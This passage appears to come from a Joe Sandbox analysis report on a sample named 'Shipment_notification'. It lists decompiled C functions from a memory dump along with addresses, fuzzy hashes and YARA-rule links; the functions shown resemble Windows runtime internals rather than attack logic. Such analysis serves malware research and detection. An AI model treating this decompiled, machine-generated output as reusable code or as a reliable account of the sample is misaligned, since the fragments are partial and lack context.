				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				void* _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				signed int _t35;

				_v8 =  *0x1bdd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01B07D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}
















                                                                                0x01b7fe96
                                                                                0x01b7fe9e
                                                                                0x01b7fea1
                                                                                0x01b7fead
                                                                                0x01b7feb3
                                                                                0x01b7feb9
                                                                                0x01b7fec3
                                                                                0x01b7fed5
                                                                                0x01b7fec5
                                                                                0x01b7fece
                                                                                0x01b7fece
                                                                                0x01b7fee0
                                                                                0x01b7fee1
                                                                                0x01b7fee3
                                                                                0x01b7fefb

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2c153592283712cf6a3ce3d323edc56b5bdd2bad189cb3538ae2a1320390529
                                                                                • Instruction ID: 9de1c36a4e2657f36cb14e74e67e599be01ade721835f3bfc00f62709648f525
                                                                                • Opcode Fuzzy Hash: c2c153592283712cf6a3ce3d323edc56b5bdd2bad189cb3538ae2a1320390529
                                                                                • Instruction Fuzzy Hash: 98016270A00219AFCB18DFA8D542A6EBBF4EF04704F1045A9F958DB382DB35E901CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BA131B Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E01BA131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1bdd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01B07D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                                                0x01ba131b
                                                                                0x01ba132a
                                                                                0x01ba1330
                                                                                0x01ba1336
                                                                                0x01ba133e
                                                                                0x01ba1341
                                                                                0x01ba1344
                                                                                0x01ba134f
                                                                                0x01ba1361
                                                                                0x01ba1351
                                                                                0x01ba135a
                                                                                0x01ba135a
                                                                                0x01ba136c
                                                                                0x01ba136d
                                                                                0x01ba136f
                                                                                0x01ba1387

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7865775c23d3dbebc5f347052cb682030e54faab3efeb4adae823d3cdfd5339d
                                                                                • Instruction ID: a79029a8f8278abd255652530c03b83059d95fc0fa27e914587cd974e7a2bc69
                                                                                • Opcode Fuzzy Hash: 7865775c23d3dbebc5f347052cb682030e54faab3efeb4adae823d3cdfd5339d
                                                                                • Instruction Fuzzy Hash: 7D013171A05219AFCB58DFA9D545AAEB7F4FF18700F404099F955EB381EB349A00CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB8F6A Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E01BB8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1bdd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01B07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				return L01B2B640(E01B29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                                                0x01bb8f6a
                                                                                0x01bb8f79
                                                                                0x01bb8f81
                                                                                0x01bb8f84
                                                                                0x01bb8f8b
                                                                                0x01bb8f91
                                                                                0x01bb8f94
                                                                                0x01bb8f9e
                                                                                0x01bb8fb0
                                                                                0x01bb8fa0
                                                                                0x01bb8fa9
                                                                                0x01bb8fa9
                                                                                0x01bb8fbb
                                                                                0x01bb8fbc
                                                                                0x01bb8fbe
                                                                                0x01bb8fd6

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b79c752420d80859f62f82685f1749f462dd3fbc74cd881948c7b56868074549
                                                                                • Instruction ID: 95acf80b5eac25c533be2a8c15ad40b52fcf8d1b57a6d49a13f92fc0de9de80c
                                                                                • Opcode Fuzzy Hash: b79c752420d80859f62f82685f1749f462dd3fbc74cd881948c7b56868074549
                                                                                • Instruction Fuzzy Hash: 4E014474A0121DAFDB18EFA8D545AAEB7F4EF18300F104499F945EB390EB74DA00CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0C577 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B0C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E01B0C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ac11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E01BB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                0x01b0c577
                                                                                0x01b0c57d
                                                                                0x01b0c581
                                                                                0x01b0c5b5
                                                                                0x01b0c5b9
                                                                                0x01b0c5ce
                                                                                0x01b0c5ce
                                                                                0x01b0c5ca
                                                                                0x00000000
                                                                                0x01b0c5ca
                                                                                0x01b0c5c4
                                                                                0x01b0c5c8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0c5ad
                                                                                0x00000000
                                                                                0x01b0c5af

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37a0c71bdaa00eede14ebfa3245af7da653cc3c4953e04fe2c0f4cc2f4081fc5
                                                                                • Instruction ID: 29be3ba560f514ecabc7a34d835f65f47a71c4fc1d4e33075e68dfcc78cb1aaa
                                                                                • Opcode Fuzzy Hash: 37a0c71bdaa00eede14ebfa3245af7da653cc3c4953e04fe2c0f4cc2f4081fc5
                                                                                • Instruction Fuzzy Hash: 16F090BA9156949FE73F871C8046B227FD8DB05670F4447EAD505875C2D7A6D880C350
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB8D34 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E01BB8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1bdd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01B07D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L01B2B640(E01B29AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}













                                                                                0x01bb8d34
                                                                                0x01bb8d43
                                                                                0x01bb8d4b
                                                                                0x01bb8d4e
                                                                                0x01bb8d52
                                                                                0x01bb8d5c
                                                                                0x01bb8d6e
                                                                                0x01bb8d5e
                                                                                0x01bb8d67
                                                                                0x01bb8d67
                                                                                0x01bb8d79
                                                                                0x01bb8d7a
                                                                                0x01bb8d7c
                                                                                0x01bb8d94

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ecdbc3ecdb49428bf8568ea1ad284ce8245fa843c86d4f067563929b56bb514
                                                                                • Instruction ID: 16ee1869f6c7c7549d02c5856bd1f771a35e4a39935a3055037ca4fb4b4f4deb
                                                                                • Opcode Fuzzy Hash: 5ecdbc3ecdb49428bf8568ea1ad284ce8245fa843c86d4f067563929b56bb514
                                                                                • Instruction Fuzzy Hash: AFF0B470A046189FDB18EFB8D541AAEB7B8EF14300F1080D9E905EB280EF34D900C754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BA2073 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E01BA2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E01B9FD22(__ecx);
				_t19 =  *0x1bd849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1bd8748; // 0x0
					if(__eflags <= 0) {
						E01BA1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1bd8724 & 0x00000004;
							if(( *0x1bd8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1bd8724; // 0x0
					return E01B98DF1(__ebx, 0xc0000374, 0x1bd5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                0x01ba2076
                                                                                0x01ba2078
                                                                                0x01ba207d
                                                                                0x01ba2083
                                                                                0x01ba20a4
                                                                                0x01ba20aa
                                                                                0x01ba20ac
                                                                                0x01ba20b7
                                                                                0x01ba20ba
                                                                                0x01ba20bc
                                                                                0x01ba20c9
                                                                                0x01ba20c9
                                                                                0x01ba20d0
                                                                                0x01ba20d2
                                                                                0x00000000
                                                                                0x01ba20d2
                                                                                0x01ba20be
                                                                                0x01ba20c3
                                                                                0x01ba20c5
                                                                                0x01ba20c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ba20c7
                                                                                0x01ba20bc
                                                                                0x01ba20d4
                                                                                0x01ba2085
                                                                                0x01ba2085
                                                                                0x01ba20a3
                                                                                0x01ba20a3

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82b8f796f7ba13e366293c30efa53663c95ac6a2e7c374432ca9fcf8671c777a
                                                                                • Instruction ID: 03ee8b7fff99098783bb87cdbddab47b8c08493530d22f638f074eadf09b77bc
                                                                                • Opcode Fuzzy Hash: 82b8f796f7ba13e366293c30efa53663c95ac6a2e7c374432ca9fcf8671c777a
                                                                                • Instruction Fuzzy Hash: E1F0552B42A1C54ADF3F6B2CB1213E13F92DB5A211F8A00CAD8909B209D7348883CF20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2927A Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E01B2927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E01B2FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E01B292C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                0x01b29295
                                                                                0x01b29299
                                                                                0x01b2929f
                                                                                0x01b292aa
                                                                                0x01b292ad
                                                                                0x01b292ae
                                                                                0x01b292af
                                                                                0x01b292b0
                                                                                0x01b292b4
                                                                                0x01b292bb
                                                                                0x01b292bb
                                                                                0x01b292c5

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                • Instruction ID: 1d19fe3ce60794ebc50afc577e290f224482d739a988322039f42b95fea72251
                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                • Instruction Fuzzy Hash: 66E0E5322405116BEB159E49CC80B133669DF92724F0140B8F5081E282C7E5D80C87A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB8CD6 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E01BB8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x1bdd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01B07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				return L01B2B640(E01B29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                                                0x01bb8ce5
                                                                                0x01bb8ced
                                                                                0x01bb8cf0
                                                                                0x01bb8cfb
                                                                                0x01bb8d0d
                                                                                0x01bb8cfd
                                                                                0x01bb8d06
                                                                                0x01bb8d06
                                                                                0x01bb8d18
                                                                                0x01bb8d19
                                                                                0x01bb8d1b
                                                                                0x01bb8d33

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab8fe6411299f999852fe605ad989fb045214750c3327300f7a3269d743e34f7
                                                                                • Instruction ID: e1e7ba5ab99e0ae9d97354c4f63a6ee7b7cffcace512f22ffb221da69a71ad18
                                                                                • Opcode Fuzzy Hash: ab8fe6411299f999852fe605ad989fb045214750c3327300f7a3269d743e34f7
                                                                                • Instruction Fuzzy Hash: 6BF054709056199BDF18DBA8D555DAE77B8EF15200F100199E955EB2C0EB34D9048754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0746D Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E01B0746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E01AFEB70(__ecx, 0x1bd79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E01B295D0();
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                0x01b0746d
                                                                                0x01b0746d
                                                                                0x01b0746d
                                                                                0x01b07471
                                                                                0x01b07488
                                                                                0x01b4f92d
                                                                                0x01b0748e
                                                                                0x01b07491
                                                                                0x01b07495
                                                                                0x01b4f937
                                                                                0x01b4f93a
                                                                                0x01b4f94e
                                                                                0x01b4f953
                                                                                0x01b4f956
                                                                                0x01b4f956
                                                                                0x01b07495
                                                                                0x00000000
                                                                                0x01b07488
                                                                                0x01b07473
                                                                                0x01b07478
                                                                                0x01b0747d
                                                                                0x01b07481
                                                                                0x00000000
                                                                                0x01b07481
                                                                                0x01b0747d
                                                                                0x01b0747a
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b36029dcc0068aaebc21ebfcc82a395c8491d2dd34047d4993ffe4a279f1f47
                                                                                • Instruction ID: 7a54e78035f4fd6c97249c30e6735d038acde54e9ef604eef612261cb747ce09
                                                                                • Opcode Fuzzy Hash: 7b36029dcc0068aaebc21ebfcc82a395c8491d2dd34047d4993ffe4a279f1f47
                                                                                • Instruction Fuzzy Hash: 36F09A34A00245AADF0F9A6CC840B7DFFA1AF04254F0682D9D9D1AB1A1EB25A800C695
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE4F2E Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AE4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E01BB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E01B0C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ac1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                0x01ae4f2e
                                                                                0x01ae4f34
                                                                                0x01ae4f38
                                                                                0x01b40b85
                                                                                0x01b40b85
                                                                                0x01b40b89
                                                                                0x01b40b9a
                                                                                0x01b40b9a
                                                                                0x01b40b9f
                                                                                0x00000000
                                                                                0x01b40b9f
                                                                                0x01b40b94
                                                                                0x01b40b98
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b40b98
                                                                                0x01ae4f3e
                                                                                0x01ae4f48
                                                                                0x00000000
                                                                                0x01ae4f6e
                                                                                0x00000000
                                                                                0x01ae4f70

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca606e20a99b2c5770446834a65c602884efc89f567fe7fee909736d3c30eff3
                                                                                • Instruction ID: 5bda81d150afd512748e6c072835358ffb0f7473bb026bb5df805a5deac4e982
                                                                                • Opcode Fuzzy Hash: ca606e20a99b2c5770446834a65c602884efc89f567fe7fee909736d3c30eff3
                                                                                • Instruction Fuzzy Hash: 98F0E9325256848FDB76FB1CC144BA27BE8EB08B74F44C4E4E505C7912C724EC40D644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB8B58 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E01BB8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x1bdd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01B07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L01B2B640(E01B29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                                                0x01bb8b67
                                                                                0x01bb8b6f
                                                                                0x01bb8b72
                                                                                0x01bb8b7d
                                                                                0x01bb8b8f
                                                                                0x01bb8b7f
                                                                                0x01bb8b88
                                                                                0x01bb8b88
                                                                                0x01bb8b9a
                                                                                0x01bb8b9b
                                                                                0x01bb8b9d
                                                                                0x01bb8bb5

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a8d1fad9dbc053dbf62e437b464c2341248cb1f9461d187f5077747e954787a
                                                                                • Instruction ID: a1ef4a63cb1767cfe5949af2f4590834273cc828cb6f7119babcf1e3ecf712bf
                                                                                • Opcode Fuzzy Hash: 7a8d1fad9dbc053dbf62e437b464c2341248cb1f9461d187f5077747e954787a
                                                                                • Instruction Fuzzy Hash: 06F05EB0A04259ABDF28EBB8D946A7EB7B8EB04300F040599FA05DB2C0EB74D900C794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1A44B Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B1A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1bd7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E01B2FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                0x01b1a44b
                                                                                0x01b1a453
                                                                                0x01b1a472
                                                                                0x01b1a476
                                                                                0x00000000
                                                                                0x01b1a493
                                                                                0x01b1a47a
                                                                                0x01b1a47f
                                                                                0x01b1a486
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fc34aab0a7576154968029c43d5768b5a89292f89d527eecd4ba05f0c0399f3
                                                                                • Instruction ID: 96a5cd4e39392f2f6cfc4b5b8d8054276f159865347560b62f374d513d832b74
                                                                                • Opcode Fuzzy Hash: 0fc34aab0a7576154968029c43d5768b5a89292f89d527eecd4ba05f0c0399f3
                                                                                • Instruction Fuzzy Hash: 3EE0D872A42421ABD7265F58FC40F6777ADDBE9A51F0A4079F604C7258DB28ED01C7E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEF358 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E01AEF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E01B1F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01B04620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                0x01aef35d
                                                                                0x01aef361
                                                                                0x01aef367
                                                                                0x01aef372
                                                                                0x01aef38c
                                                                                0x01aef38c
                                                                                0x01aef394

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                • Instruction ID: 0d3ce375d03ee772370ee22d44d49b237c88a47fe82f7c61b3a7ef73094cfda9
                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                • Instruction Fuzzy Hash: 5CE0DF32A40119FFDB21AAD99E09FAABFACDB98A60F0101D6FA04D7190D6709E00C2D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AFFF60 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AFFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1ac11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E01BB88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
